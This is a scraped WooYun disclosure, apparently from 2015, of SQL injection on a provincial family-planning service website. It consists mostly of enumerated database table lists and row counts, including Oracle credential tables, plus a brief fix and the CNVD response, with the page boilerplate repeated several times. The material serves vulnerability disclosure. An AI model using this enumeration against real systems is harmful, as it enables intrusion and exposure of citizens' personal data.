| HAND_REPORT_ITEM_TYPE_DETAIL   |
| IDTABLE                        |
| IPCONFIG                       |
| JIANGLIFUZHUDXNSSQBD           |
| JIANGLIFUZHUDXSQBD1            |
| JIANGLIFUZHUDXTCSQBD           |
| JISHUFUWUJGBGSQBD1             |
| JISHUFUWUJGSZSQBD1             |
| JISHUFUWUJGXYSQBD1             |
| JISHUFUWUJGZYXKZSQBD1          |
| JISHUFUWURYHGZSQBD1            |
| JISHUFUWURYZYXYSQBD            |
| KUASHENGLIUDONGRKYHSYZM        |
| LC_DYNA_ATSOFMWG161737         |
| LC_DYNA_CBKDDEWP153101         |
| LC_DYNA_SQFPPWHK160602         |
| LC_DYNA_UNZVVQVR160155         |
| LC_DYNA_ZCIPVHUG154110         |
| LC_DYNA_ZCLOKXCT160131         |
| LDRKHYZMBD_WEIHUN              |
| LIUDONGRENKOUFNYHBD1           |
| LIUDONGRENKOUHYZMBD1           |
| LIUDONGRENKOUNYYHBD1           |
| NONGYEERHAIBD                  |
| NONGYEYIHAIBD1                 |
| OUT_ADVISE                     |
| OUT_AUDITING                   |
| OUT_BUQITABLE                  |
| OUT_DRAFTBOX                   |
| OUT_EXPORTALREQ                |
| OUT_FAQ                        |
| OUT_FEEDBACK                   |
| OUT_FUJIAN                     |
| OUT_INFOCOLUMNREGIONALISM      |
| OUT_INFORM                     |
| OUT_INFORMATION                |
| OUT_INFORMATION_ATT            |
| OUT_INFORMATION_ATTACHMENT     |
| OUT_INFORMATION_BUSINESSTYPE   |
| OUT_INFORMATION_CONTENT        |
| OUT_INFORMATION_DOCUMENT       |
| OUT_INFORMATION_EXTEND         |
| OUT_INFORMATION_FIELD          |
| OUT_INFORMATION_FIELDACL       |
| OUT_INFORMATION_FLOW           |
| OUT_INFORMATION_FLOW_PRO       |
| OUT_INFORMATION_PIC            |
| OUT_INFORMATION_STENCIL        |
| OUT_INFORMATION_TAB            |
| OUT_INFORMATION_TABSET         |
| OUT_INFORM_PRIVILEGE           |
| OUT_LINKURL                    |
| OUT_ONLINEMONITOR              |
| OUT_ONLINEQUERY                |
| OUT_ONLINEREJECT               |
| OUT_ONLINEREPLY                |
| OUT_ONLINESET                  |
| OUT_ONLINETRANSPORT            |
| OUT_OPERATENUM                 |
| OUT_PROCEED_DATA               |
| OUT_QUEUE_TODOLIST             |
| OUT_REPARATION_STENCILREASON   |
| OUT_USERS                      |
| OUT_USERS_RANDOMNUM            |
| OUT_VISITORNUMBER              |
| OUT_VOTE                       |
| OUT_VOTE_ITEM                  |
| OUT_VOTE_LOG                   |
| TEBIEFUZHUDXNSSQB              |
| TEBIEFUZHUDXSQB                |
| TEBIEFUZHUDXTCSQBD             |
+--------------------------------+
============================================================
Database: ECGAPOUT_DBA
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| NONGYEYIHAIBD1               | 392519  |
| NONGYEERHAIBD                | 134529  |
| FEINONGYEYIHBD               | 69123   |
| DUSHENGZINVFMGRZBD1          | 14874   |
| LIUDONGRENKOUHYZMBD1         | 14050   |
| FEINONGERHAIBD1              | 12615   |
| LDRKHYZMBD_WEIHUN            | 4401    |
| ACCOUNTACTIVATION            | 4312    |
| OUT_USERS                    | 3795    |
| IPCONFIG                     | 2554    |
| FORM_TABLE_FIELD             | 1701    |
| FORM_WIDGET_FIELD            | 1701    |
| OUT_EXPORTALREQ              | 1511    |
| OUT_BUQITABLE                | 1160    |
| OUT_DRAFTBOX                 | 966     |
| JIANGLIFUZHUDXSQBD1          | 886     |
| FORMMAPFIELD                 | 885     |
| OUT_ONLINEQUERY              | 308     |
| OUT_INFORMATION_EXTEND       | 300     |
| LIUDONGRENKOUNYYHBD1         | 212     |
| OUT_INFORMATION_CONTENT      | 196     |
| FORM_FIELD_EXPAND            | 165     |
| KUASHENGLIUDONGRKYHSYZM      | 136     |
| OUT_INFORMATION_STENCIL      | 129     |
| OUT_INFORMATION_ATT          | 121     |
| OUT_ADVISE                   | 102     |
| OUT_INFORMATION_PIC          | 88      |
| LIUDONGRENKOUFNYHBD1         | 79      |
| FORM_WIDGET                  | 71      |
| OUT_REPARATION_STENCILREASON | 71      |
| OUT_USERS_RANDOMNUM          | 71      |
| TEBIEFUZHUDXSQB              | 55      |
| OUT_FEEDBACK                 | 41      |
| JIANGLIFUZHUDXTCSQBD         | 30      |
| OUT_INFORMATION_FLOW         | 30      |
| OUT_INFORMATION_BUSINESSTYPE | 29      |
| FORM_TABLE                   | 28      |
| LC_DYNA_CBKDDEWP153101       | 28      |
| OUT_INFORMATION_FLOW_PRO     | 27      |
| FORM                         | 22      |
| FORMMAPTABLE                 | 22      |
| IDTABLE                      | 18      |
| JISHUFUWURYHGZSQBD1          | 18      |
| LC_DYNA_ZCLOKXCT160131       | 17      |
| JIANGLIFUZHUDXNSSQBD         | 11      |
| OUT_ONLINEREPLY              | 11      |
| OUT_INFORMATION              | 9       |
| JISHUFUWUJGSZSQBD1           | 7       |
| OUT_INFORM                   | 5       |
| OUT_OPERATENUM               | 4       |
| LC_DYNA_ATSOFMWG161737       | 3       |
| TEBIEFUZHUDXNSSQB            | 3       |
| JISHUFUWUJGBGSQBD1           | 2       |
| JISHUFUWURYZYXYSQBD          | 2       |
| LC_DYNA_ZCIPVHUG154110       | 2       |
| TEBIEFUZHUDXTCSQBD           | 2       |
| JISHUFUWUJGXYSQBD1           | 1       |
| JISHUFUWUJGZYXKZSQBD1        | 1       |
| OUT_AUDITING                 | 1       |
| OUT_FAQ                      | 1       |
| OUT_VISITORNUMBER            | 1       |
+------------------------------+---------+

=====================================================

============================================================
Database: SYSMAN
[337 tables]
+--------------------------------+
| AQ$_MGMT_NOTIFY_QTABLE_G       |
| AQ$_MGMT_NOTIFY_QTABLE_H       |
| AQ$_MGMT_NOTIFY_QTABLE_I       |
| AQ$_MGMT_NOTIFY_QTABLE_S       |
| AQ$_MGMT_NOTIFY_QTABLE_T       |
| EM_IPW_INFO                    |
| ESM_COLLECTION                 |
| MGMT_ADMIN_LICENSES            |
| MGMT_ADMIN_METRIC_THRESHOLDS   |
| MGMT_AGENT_SEC_INFO            |
| MGMT_ANNOTATION                |
| MGMT_ARU_CREDENTIALS           |
| MGMT_ARU_FAMILY_PRODUCT_MAP    |
| MGMT_ARU_LANGUAGES             |
| MGMT_ARU_OUI_COMPONENTS        |
| MGMT_ARU_PLATFORMS             |
| MGMT_ARU_PRODUCTS              |
| MGMT_ARU_PRODUCT_RELEASE_MAP   |
| MGMT_ARU_RELEASES              |
| MGMT_AVAILABILITY              |
| MGMT_AVAILABILITY_MARKER       |
| MGMT_BACKUP_CONFIGURATION      |
| MGMT_BCN_AVAIL_DEF             |
| MGMT_BCN_AVAIL_JOB             |
| MGMT_BCN_AVAIL_LOG             |
| MGMT_BCN_TARGET                |
| MGMT_BCN_TARGET_LOCK           |
| MGMT_BCN_TARGET_TXN            |
| MGMT_BCN_TXN_DEFN              |
| MGMT_BCN_TXN_HTTP              |
| MGMT_BCN_TXN_HTTP_PARAM        |
| MGMT_BCN_TXN_PING              |
| MGMT_BLACKOUTS                 |
| MGMT_BLACKOUT_FLAT_TARGETS     |
| MGMT_BLACKOUT_HISTORY          |
| MGMT_BLACKOUT_PROXY_TARGETS    |
| MGMT_BLACKOUT_REASON           |
| MGMT_BLACKOUT_SCHEDULE         |
| MGMT_BLACKOUT_STATE            |
| MGMT_BLACKOUT_TARGET_DETAILS   |
| MGMT_BLACKOUT_WINDOWS          |
| MGMT_BUG_ADVISORY              |
| MGMT_BUG_ADVISORY_BUG          |
| MGMT_BUG_ADV_HOME_PATCH        |
| MGMT_BUG_AVAILABLE_PATCH       |
| MGMT_BUG_FIX_APPLICABLE_COMP   |
| MGMT_BUG_FIX_APPLIC_COMP_LIST  |
| MGMT_BUG_PATCH_FIXES_BUG       |
| MGMT_BUG_PATCH_PLATFORM        |
| MGMT_CHANGE_AGENT_URL          |
| MGMT_COLLECTION_CREDENTIALS    |
| MGMT_COLLECTION_PROPERTIES     |
| MGMT_COMP_RESULT_TO_JOB_MAP    |
| MGMT_COMP_TARGET_DEF           |
| MGMT_CONTAINER_CREDENTIALS     |
| MGMT_CREATED_USERS             |
| MGMT_CREDENTIALS               |
| MGMT_CREDENTIALS2              |
| MGMT_CREDENTIAL_SETS           |
| MGMT_CREDENTIAL_SET_COLUMNS    |
| MGMT_CREDENTIAL_TYPES          |
| MGMT_CREDENTIAL_TYPE_COLUMNS   |
| MGMT_CREDENTIAL_TYPE_COL_VALS  |
| MGMT_CREDENTIAL_TYPE_REF       |
| MGMT_CURRENT_AVAILABILITY      |
| MGMT_CURRENT_METRICS           |
| MGMT_CURRENT_METRIC_ERRORS     |
| MGMT_CURRENT_SEVERITY          |
| MGMT_DBNET_TNS_ADMINS          |
| MGMT_DB_CONTROLFILES_ECM       |
| MGMT_DB_DATAFILES_ECM          |
| MGMT_DB_DBNINSTANCEINFO_ECM    |
| MGMT_DB_FEATUREUSAGE           |
| MGMT_DB_HDM_METRIC_HELPER      |
| MGMT_DB_INIT_PARAMS_ECM        |
| MGMT_DB_INVOBJS_ECM            |
| MGMT_DB_LATEST_HDM_FINDINGS    |
| MGMT_DB_LICENSE_ECM            |
| MGMT_DB_RECSEGMENTSETTINGS_ECM |
| MGMT_DB_RECTSSETTINGS_ECM      |
| MGMT_DB_RECUSERSETTINGS_ECM    |
| MGMT_DB_REDOLOGS_ECM           |
| MGMT_DB_ROLLBACK_SEGS_ECM      |
| MGMT_DB_SGA_ECM                |
| MGMT_DB_TABLESPACES_ECM        |
| MGMT_DELTA_COMPARISON_DELTAS   |
| MGMT_DELTA_COMP_DELTA_DETAILS  |
| MGMT_DELTA_COMP_KEY_COLS       |
| MGMT_DELTA_COMP_PROPERTIES     |
| MGMT_DELTA_COMP_SUMMARIES      |
| MGMT_DELTA_ENTRY               |
| MGMT_DELTA_ENTRY_VALUES        |
| MGMT_DELTA_IDS                 |
| MGMT_DELTA_ID_VALUES           |
| MGMT_DELTA_SAVED_COMPARISON    |
| MGMT_DELTA_SNAP                |
| MGMT_DELTA_SUMMARY_ERRORS      |
| MGMT_DIROBJ_USERS_HOTLIST      |
| MGMT_DUPLICATE_TARGETS         |
| MGMT_E2E_DETAILS               |
| MGMT_E2E_DETAILS_1DAY          |
| MGMT_E2E_DETAILS_1HOUR         |
| MGMT_E2E_JDBC                  |
| MGMT_E2E_JDBC_1DAY             |
| MGMT_E2E_JDBC_1HOUR            |
| MGMT_E2E_SQL                   |
| MGMT_E2E_SQL_1DAY              |
| MGMT_E2E_SQL_1HOUR             |
| MGMT_E2E_SQL_CONN              |
| MGMT_E2E_SQL_STMT              |
| MGMT_E2E_SUMMARY               |
| MGMT_E2E_SUMMARY_1DAY          |
| MGMT_E2E_SUMMARY_1HOUR         |
| MGMT_ECM_ARU_MAP               |
| MGMT_ECM_CSA                   |
| MGMT_ECM_CSA_COOKIES           |
| MGMT_ECM_CSA_CUSTOM            |
| MGMT_ECM_CSA_GENERAL_INFO      |
| MGMT_ECM_CSA_SNAPSHOT_INFO     |
| MGMT_ECM_GEN_SNAPSHOT          |
| MGMT_ECM_HOST_CONFIGS_TO_DEL   |
| MGMT_ECM_HW                    |
| MGMT_ECM_HW_CPU                |
| MGMT_ECM_HW_IOCARD             |
| MGMT_ECM_HW_NIC                |
| MGMT_ECM_LOADED_FILES          |
| MGMT_ECM_OS                    |
| MGMT_ECM_OS_COMPONENT          |
| MGMT_ECM_OS_FILESYSTEM         |
| MGMT_ECM_OS_PROPERTY           |
| MGMT_ECM_OS_REGISTERED_SW      |
| MGMT_ECM_OS_REGISTERED_SW_COMP |
| MGMT_ECM_PATCH_CACHE           |
| MGMT_ECM_RESOURCES             |
| MGMT_ECM_SNAPSHOT              |
| MGMT_ECM_SNAPSHOT_MD_COLUMNS   |
| MGMT_ECM_SNAPSHOT_MD_TABLES    |
| MGMT_ECM_SNAPSHOT_METADATA     |
| MGMT_ECM_SNAP_COMPONENT_INFO   |
| MGMT_EMCRYPTO_SEED             |
| MGMT_EMD_PING                  |
| MGMT_ENTERPRISE_CREDENTIALS    |
| MGMT_FAILOVER_CALLBACKS        |
| MGMT_FAILOVER_TABLE            |
| MGMT_FLAT_TARGET_MEMBERSHIPS   |
| MGMT_HA_BACKUP                 |
| MGMT_HA_CLS_INTR_CONN          |
| MGMT_HA_FILES_ECM              |
| MGMT_HA_INFO_ECM               |
| MGMT_HA_INIT_PARAMS_ECM        |
| MGMT_HA_MTTR                   |
| MGMT_HA_RAC_INTR_CONN          |
| MGMT_HA_RMAN_CONFIG_ECM        |
| MGMT_HC_CPU_DETAILS            |
| MGMT_HC_FS_MOUNT_DETAILS       |
| MGMT_HC_HARDWARE_MASTER        |
| MGMT_HC_IOCARD_DETAILS         |
| MGMT_HC_NIC_DETAILS            |
| MGMT_HC_OS_COMPONENTS          |
| MGMT_HC_OS_PROPERTIES          |
| MGMT_HC_OS_SUMMARY             |
| MGMT_HC_SYSTEM_SUMMARY         |
| MGMT_HC_VENDOR_SW_COMPONENTS   |
| MGMT_HC_VENDOR_SW_SUMMARY      |
| MGMT_HOST_CREDENTIALS          |
| MGMT_INDEX_SIZES               |
| MGMT_INV_COMPONENT             |
| MGMT_INV_COMPONENT_PATCH       |
| MGMT_INV_CONTAINER             |
| MGMT_INV_CONTAINER_PROPERTY    |
| MGMT_INV_DEPENDENCY_RULE       |
| MGMT_INV_FILE                  |
| MGMT_INV_PATCH                 |
| MGMT_INV_PATCHED_FILE          |
| MGMT_INV_PATCHED_FILE_COMP     |
| MGMT_INV_PATCHSET              |
| MGMT_INV_PATCH_FIXED_BUG       |
| MGMT_INV_VERSIONED_PATCH       |
| MGMT_JOB                       |
| MGMT_JOB_BLACKOUT_ASSOC        |
| MGMT_JOB_CALLBACKS             |
| MGMT_JOB_COMMAND               |
| MGMT_JOB_CREDENTIALS           |
| MGMT_JOB_CRED_PARAMS           |
| MGMT_JOB_EMD_STATUS_QUEUE      |
| MGMT_JOB_EVENT                 |
| MGMT_JOB_EXECPLAN              |
| MGMT_JOB_EXECUTION             |
| MGMT_JOB_EXEC_EVENT_PARAMS     |
| MGMT_JOB_EXEC_LOCKS            |
| MGMT_JOB_EXEC_SUMMARY          |
| MGMT_JOB_EXT_TARGETS           |
| MGMT_JOB_FLAT_TARGETS          |
| MGMT_JOB_HISTORY               |
| MGMT_JOB_LARGE_PARAMS          |
| MGMT_JOB_LOCK_INFO             |
| MGMT_JOB_LOCK_TARGETS          |
| MGMT_JOB_NESTED_JOB_TARGETS    |
| MGMT_JOB_OUTPUT                |
| MGMT_JOB_PARAMETER             |
| MGMT_JOB_PARAM_SOURCE          |
| MGMT_JOB_PROP_PARAMS           |
| MGMT_JOB_PURGE_CRITERIA        |
| MGMT_JOB_PURGE_POLICIES        |
| MGMT_JOB_PURGE_TARGETS         |
| MGMT_JOB_PURGE_VALUES          |
| MGMT_JOB_QUEUES                |
| MGMT_JOB_SCHEDULE              |
| MGMT_JOB_SEC_INFO              |
| MGMT_JOB_SINGLE_TARGET_TYPES   |
| MGMT_JOB_SQL_PARAMS            |
| MGMT_JOB_STEP_COMMAND_LOG      |
| MGMT_JOB_STEP_PARAMS           |
| MGMT_JOB_STEP_TARGETS          |
| MGMT_JOB_SUBST_PARAMS          |
| MGMT_JOB_TARGET                |
| MGMT_JOB_TYPE_DISPLAY_INFO     |
| MGMT_JOB_TYPE_DISPLAY_PARAM    |
| MGMT_JOB_TYPE_INFO             |
| MGMT_JOB_TYPE_URI_INFO         |
| MGMT_JOB_USER_PARAMS           |
| MGMT_JOB_VALUE_PARAMS          |
| MGMT_LICENSABLE_TARGET_TYPES   |
| MGMT_LICENSES                  |
| MGMT_LICENSE_DEFINITIONS       |
| MGMT_LOGIN_ASSISTANTS          |
| MGMT_LONG_TEXT                 |
| MGMT_MASTER_AGENT              |
| MGMT_MASTER_CHANGED_CALLBACK   |
| MGMT_METADATA_SETS             |
| MGMT_METRICS                   |
| MGMT_METRICS_1DAY              |
| MGMT_METRICS_1HOUR             |
| MGMT_METRICS_COMPOSITE_KEYS    |
| MGMT_METRICS_EXT               |
| MGMT_METRICS_RAW               |
| MGMT_METRIC_COLLECTIONS        |
| MGMT_METRIC_COLLECTIONS_REP    |
| MGMT_METRIC_DEPENDENCY         |
| MGMT_METRIC_DEPENDENCY_DEF     |
| MGMT_METRIC_DEPENDENCY_DETAILS |
| MGMT_METRIC_ERRORS             |
| MGMT_METRIC_THRESHOLDS         |
| MGMT_NOTIFICATION_LOG          |
| MGMT_NOTIFY_DEVICES            |
| MGMT_NOTIFY_DEVICE_PARAMS      |
| MGMT_NOTIFY_DEV_SCHEDULES      |
| MGMT_NOTIFY_EMAIL_GATEWAY      |
| MGMT_NOTIFY_NOTIFYEES          |
| MGMT_NOTIFY_PROFILES           |
| MGMT_NOTIFY_QTABLE             |
| MGMT_NOTIFY_QUEUES             |
| MGMT_NOTIFY_REQUEUE            |
| MGMT_NOTIFY_RULES              |
| MGMT_NOTIFY_RULE_CONFIGS       |
| MGMT_NOTIFY_SCHEDULES          |
| MGMT_OB_ADMIN_CLIENT_DB        |
| MGMT_OB_ADMIN_HOSTS            |
| MGMT_OMS_PARAMETERS            |
| MGMT_OSM_DISK_GROUP_ECM        |
| MGMT_PARAMETERS                |
| MGMT_PERFORMANCE_NAMES         |
| MGMT_PLANPROBLEM_FACTORS       |
| MGMT_POLICY_ERRORS             |
| MGMT_POLICY_GROUP              |
| MGMT_POLICY_PARAMS             |
| MGMT_POLICY_RULE               |
| MGMT_POLICY_RULE_CRITERIA      |
| MGMT_POLICY_RULE_DEF_COLUMNS   |
| MGMT_POLICY_RULE_DEF_PARAMS    |
| MGMT_POLICY_SNAPSHOT_CRITERIA  |
| MGMT_POLICY_TARGET_CRITERIA    |
| MGMT_POLICY_VIOLATIONS         |
| MGMT_POLICY_VIOLATION_ROWS     |
| MGMT_POLICY_VIOLATION_VALUES   |
| MGMT_PORTLET_PREFERENCE_STORE  |
| MGMT_PRIVS                     |
| MGMT_PRIV_GRANTS               |
| MGMT_PRIV_INCLUDES             |
| MGMT_PURGE_POLICY              |
| MGMT_PURGE_POLICY_GROUP        |
| MGMT_PURGE_POLICY_TARGET_STATE |
| MGMT_RCVCAT_CONFIG             |
| MGMT_RCVCAT_REPOS              |
| MGMT_REBUILD_INDEXES           |
| MGMT_ROLES                     |
| MGMT_ROLE_GRANTS               |
| MGMT_SEC_INFO                  |
| MGMT_SEVERITY                  |
| MGMT_SPACE_METRICS             |
| MGMT_SQLPROBLEM_FACTORS        |
| MGMT_SQL_BIND_VARS             |
| MGMT_SQL_EVALUATION            |
| MGMT_SQL_METRIC_HELPER         |
| MGMT_SQL_PLAN                  |
| MGMT_SQL_REUSE                 |
| MGMT_SQL_SUMMARY               |
| MGMT_STRING_METRIC_HISTORY     |
| MGMT_SYSTEM_ERROR_LOG          |
| MGMT_SYSTEM_PERFORMANCE_LOG    |
| MGMT_TABLE_SIZES               |
| MGMT_TARGETS                   |
| MGMT_TARGETS_DELETE            |
| MGMT_TARGET_ADD_CALLBACKS      |
| MGMT_TARGET_AGENT_ASSOC        |
| MGMT_TARGET_ASSOC              |
| MGMT_TARGET_ASSOC_INSTANCE     |
| MGMT_TARGET_BASELINES          |
| MGMT_TARGET_BASELINES_DATA     |
| MGMT_TARGET_CREDENTIALS        |
| MGMT_TARGET_DELETE_CALLBACKS   |
| MGMT_TARGET_DELETE_EXCEPTIONS  |
| MGMT_TARGET_MEMBERSHIPS        |
| MGMT_TARGET_PROPERTIES         |
| MGMT_TARGET_PROP_DEFS          |
| MGMT_TARGET_ROLLUP_TIMES       |
| MGMT_TARGET_TYPES              |
| MGMT_TARGET_TYPE_COMPONENT_MAP |
| MGMT_TYPE_PROPERTIES           |
| MGMT_UPDATE_CREDENTIALS_DATA   |
| MGMT_UPDATE_OPERATIONS         |
| MGMT_UPDATE_OPERATIONS_DATA    |
| MGMT_UPDATE_OPERATIONS_DETAILS |
| MGMT_UPDATE_PROPERTIES_DATA    |
| MGMT_UPDATE_THRESHOLDS_DATA    |
| MGMT_USER_CALLBACKS            |
| MGMT_USER_CONTEXT              |
| MGMT_USER_FOLDERS              |
| MGMT_USER_JOBS                 |
| MGMT_USER_PREFERENCES          |
| MGMT_USER_TARGETS              |
| MGMT_USER_TYPE_METRIC_PREFS    |
| MGMT_VERSIONS                  |
| MGMT_VIEW_USER_CREDENTIALS     |
| SYS_IOT_OVER_49766             |
| SYS_IOT_OVER_49869             |
| SYS_IOT_OVER_49872             |
+--------------------------------+

未作任何脱裤等危险性操作，仅做友情测试~

修复方案：

过滤

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-11-24 18:49

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给河南分中心，由河南分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154310

漏洞标题：某省人口和计划生育网上便民服务中心站点多个漏洞打包（导致大量敏感信息泄露）

相关厂商：cncert国家互联网应急中心

漏洞作者： goubuli

提交时间：2015-11-20 20:30

修复时间：2016-01-11 15:34

公开时间：2016-01-11 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154310

漏洞标题：某省人口和计划生育网上便民服务中心站点多个漏洞打包（导致大量敏感信息泄露）

相关厂商：cncert国家互联网应急中心

漏洞作者： goubuli

提交时间：2015-11-20 20:30

修复时间：2016-01-11 15:34

公开时间：2016-01-11 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154310"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：